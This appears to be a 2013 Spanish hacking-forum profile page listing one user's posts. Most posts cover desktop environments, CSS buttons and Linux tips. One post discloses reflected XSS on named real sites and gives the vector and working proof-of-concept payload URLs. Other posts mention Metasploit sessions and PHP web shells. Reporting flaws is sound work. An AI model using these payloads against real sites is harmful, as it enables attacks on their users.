Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Jimeno

#301
Dudas y pedidos generales / Re:No-ip mas Metasploit
Septiembre 18, 2013, 10:50:33 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
se debe usar siempre este metodo para cualquier tipo de exploit?
Este es el método que has de seguir si quieres conseguir una sesión de meterpreter, que supongo que será lo que tú querrás, así que, sí.
#302
Dudas y pedidos generales / Re:No-ip mas Metasploit
Septiembre 16, 2013, 10:36:09 AM
Si no me equivoco esto es a lo que te refieres:

Saludos.
#303
Off Topic / Re:Y vos.. Qué harías con un Arduino?
Septiembre 10, 2013, 08:22:16 AM
Cualquiera de estos proyectos me parece una gran idea: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Personalmente la batería robótica me sorprendió.
#304
Python / Re:Cifrado Morse
Septiembre 06, 2013, 11:46:26 AM
Un cifrado más, buena esa, Sanko.
Pero ya tenías que aburrirte para haber programado esto... Lo mejor de todo los ejemplos, jajajajaja.
PD: me gusta lo limpio que te quedó el código :P
#305
Dudas y pedidos generales / Re:¿Que es mas underground?
Septiembre 04, 2013, 01:11:21 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Como dijerón los chicos de Bugtraq por TW, awesome es un buen entorno.
De todas formas son preguntas como estas las que dan la risa cuando las lees XD, entornos más underground, música underground...
Para mi el underground no tiene "físico", el underground es simplemente todo aquello que no ha sido o no se ha dejado comercializar, así que nose cual será vuestro concepto.
Awesome y Openbox son los dos entornos gráficos que todo el mundo tiende a entender que son los de "juackiers reales", los que en una película aparecerían, no da la misma impresión ver a un tío con una terminal y conky abiertos con Unity que con Awesome, ¿no?
En cuanto a qué es y qué no es Underground, yo no tengo definición alguna, entendí lo que me pareción y de ahí mi respuesta, pero podría decirse que tu definición me parece apropiada :P
#306
Al comentario anterior al mío, entra aquí y haz el test que hay, al final te dirá cuáles son las distribuciones más adecuadas para ti: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Un saludo.
#307
Dudas y pedidos generales / Re:¿Que es mas underground?
Septiembre 03, 2013, 02:08:29 PM
Si quieres un entorno de escritorio muy personalizable yo te recomiendo Openbox, es difícil de configurar, pero deja resultados como estos (no es mi PC):
En cuanto a los entornos mencionados, Mate no está nada mal, yo ahora ando con Cinnamon y para mi gusto me quedó liviano y bonito.
Saludos.
#308
Dudas y pedidos generales / Re:red android
Septiembre 01, 2013, 02:38:33 PM
Esa red se trata de cuando usas el teléfono Android como punto de acceso para otros dispositivos, es decir, cuando actúa como router, ya sea, gracias a los datos (3G) o que el teléfono esté conectado a otra red wifi pero tú crees tu propio punto de acceso desde el dispositivo.
Revisa esto y lo entenderás: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Saludos.
#309
Hacking ShowOff / Re:XSS - Nutella
Agosto 27, 2013, 08:08:34 AM
Este ya lo había reportado y publicado yo el 20 de Febrero :P
Aquí una imagen: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Saludos. ((:
#310
Buenas a todos.
Quería compartir con ustedes este pequeño pero a la vez eficaz servicio que nos proporciona una interfaz gráfica a la hora de crear el estilo para nuestros botones en CSS3.

Con un par de clics y cambios de colores en su genial interfaz, nos proporciona un código de lo más completo, vean este ejemplo:
Código: html5
<button type="button" name="" value="" class="css3button">submit</button>

Código: css
button.css3button {
font-family: Arial, Helvetica, sans-serif;
font-size: 14px;
color: #ffffff;
padding: 10px 20px;
background: -moz-linear-gradient(
top,
#17998e 0%,
#e8e864);
background: -webkit-gradient(
linear, left top, left bottom,
from(#17998e),
to(#e8e864));
-moz-border-radius: 0px;
-webkit-border-radius: 0px;
border-radius: 0px;
border: 1px solid #7d0000;
-moz-box-shadow:
0px 1px 3px rgba(000,000,000,0.5),
inset 0px 0px 2px rgba(255,255,255,0.7);
-webkit-box-shadow:
0px 1px 3px rgba(000,000,000,0.5),
inset 0px 0px 2px rgba(255,255,255,0.7);
box-shadow:
0px 1px 3px rgba(000,000,000,0.5),
inset 0px 0px 2px rgba(255,255,255,0.7);
text-shadow:
0px -1px 0px rgba(000,000,000,0.4),
0px 1px 0px rgba(255,255,255,0.3);
}


De hecho, para facilitar el trabajo, hay una gran variedad de botones ya creados.
Link: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos.
#311
Debes bajar el paquete que sea para tu arquitectura, si es de 32 bits o 64.
Para saberlo, en la terminal, escribe esto:
Código: text
jimeno@jimeno--Notebook ~ $ uname -m
x86_64

En mi caso deberé bajar la de 64 bits, si te sale x86_32 baja el paquete de 32 bits.
Saludos y espero que te sirva.
#312
Off Topic / Re:(No apto para fracasados)
Julio 14, 2013, 08:18:31 PM
Increíble vídeo ((: Muchas gracias por compartirlo.
#313
Underc0de / Re:Biblioteca Virtual | Underc0de
Julio 13, 2013, 04:34:04 PM
Espero que la colaboración de todo el Staff no haya sido en vano..
No saturen el servidor ((:
Enhorabuena a los demás que colaborasteis también.
#314
Si pueden participar los del staff me apunto.
#315
Galería / Re:Mi galeria de dibujos en Paint (5)
Julio 05, 2013, 03:16:10 PM
Cronos, eso no es nivel, observa:


You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Yo quiero que haga este!
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Saludos,, Cronos.-
#316
A mí este post me gusta porque es un SQLi, y eso ni mucho menos es un fallo de seguridad leve, y porque además no se trata de una panadería ni ferretería, sino una web gubernamental.
Lo de que se debe dar vida a la sección estoy completamente de acuerdo.
En cuanto al encontronazo con Matabarras, no discutan, él es un buen tío (lo digo de primerísima mano) y no publica ni la mitad de lo que encuentra, y le respeto tanto como a todos los demás miembros del staff y usuarios del foro.

En fin, en cuanto pueda daré yo también vida a la sección con unos pocos fallos guardados que tengo.
Saludos.
#317
Buenas a todos.
Se trata de un XSS reflejado en TODOS los dominios de la empresa.

Para no publicar imágenes puesto a que son demasiados dejaré un par de ejemplos y el vector utilizado.

El vector será:
Código: text
"/><svg/onload=confirm(/Jimeno/.source);>

Estado: REPORTADOS

Unos ejemplos del fallo:
Código: text
http://buscar.hispavista.com/?q=%22%2F%3E%3Csvg%2Fonload%3Dconfirm%280%29%3B%3E
http://buscar.hispavista.com/?q=%22%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E%3C%22&str=%22%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E%3C%22&cadena=%22%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E%3C%22
labolsa.com/buscador/?cadenaBusqueda=""%3B<%2Fscript><script>alert(0)<%2Fscript><"&buscar=Buscar
http://turismo.hispavista.com/buscar/?q=%22%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E%3C%22&Submit=Buscar+en+Turismo&cadena=%22%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E%3C%22&str=%22%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E%3C%22
http://paginasamarillas.hispavista.com/index.phtml?cadena=%22%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E%3C%22&Submit=Buscar+en+P%E1g.+amarillas&oculto=SPAIN&str=%22%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E%3C%22
http://buscar.hispavista.com/?q=%3CBODY+ONLOAD%3Dalert%28%27XSS%27%29%3E&Submit=Buscar

Hay muchos más, estos son unos ejemplos.
AFECTA A TODO EL SERVIDOR.
Saludos.
#318
¿Probaste a utilizar los métodos automatizados que incluyen algunas shell? Puede que tú hagas algún paso mal. Creo que algunas son específicas para ese proceso, y otras llevan un apartado dedicado especialmente al proceso.
Googlea en ello, pero si no recuerdo mal alguna que se llamaba 606.php o 666.php no estoy seguro, tenía un apartado para ello.
Saludos ^^
#319
Defacers, defacers... este mundo no es para vosotros...
De todas formas revisa aquí:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Este creo que te ayudará: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos, y deja el defacing.
#320
Hacking ShowOff / Re:XSS en Bankia
Junio 06, 2013, 08:39:19 PM
Ahí está funcionando en Chromium actualizado.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
URL: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos.